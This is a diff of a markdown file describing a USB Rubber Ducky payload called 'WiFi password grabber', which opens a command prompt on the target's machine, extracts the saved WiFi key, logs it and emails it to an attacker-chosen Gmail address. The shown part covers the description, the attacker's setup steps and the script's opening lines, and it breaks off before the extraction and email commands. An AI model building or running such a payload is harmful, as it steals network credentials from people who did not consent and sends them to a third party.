abhinavvv03/Rubber-Duckey/Payload---WiFi-password-grabber.md

-# This payload:
-1. Opens CMD
-2. Finds the key (password) of the WiFi the target is connected to
-3. Saves the SSID, Network type, Authentication and the key to Log.txt
-4. And emails Log.txt via gmail

 ### Change the following things;
 * **ACCOUNT**: Your **gmail account**
 * **PASSWORD**: Your **gmail password**
 * **RECEIVER**: The email you want to send Log.txt to

-If you have **any suggestions** please **tell me**.

-## **Code**:
+## **Code**;
 ```
+REM Title: WiFi password grabber
 REM Author: Siem
-REM Version: 2.1
+REM Version: 3
-REM Description: Clear text WiFi key grabber
+REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
-DELAY 2500
+DELAY 3000

+REM --> Minimize all windows
 WINDOWS d

 REM --> Open cmd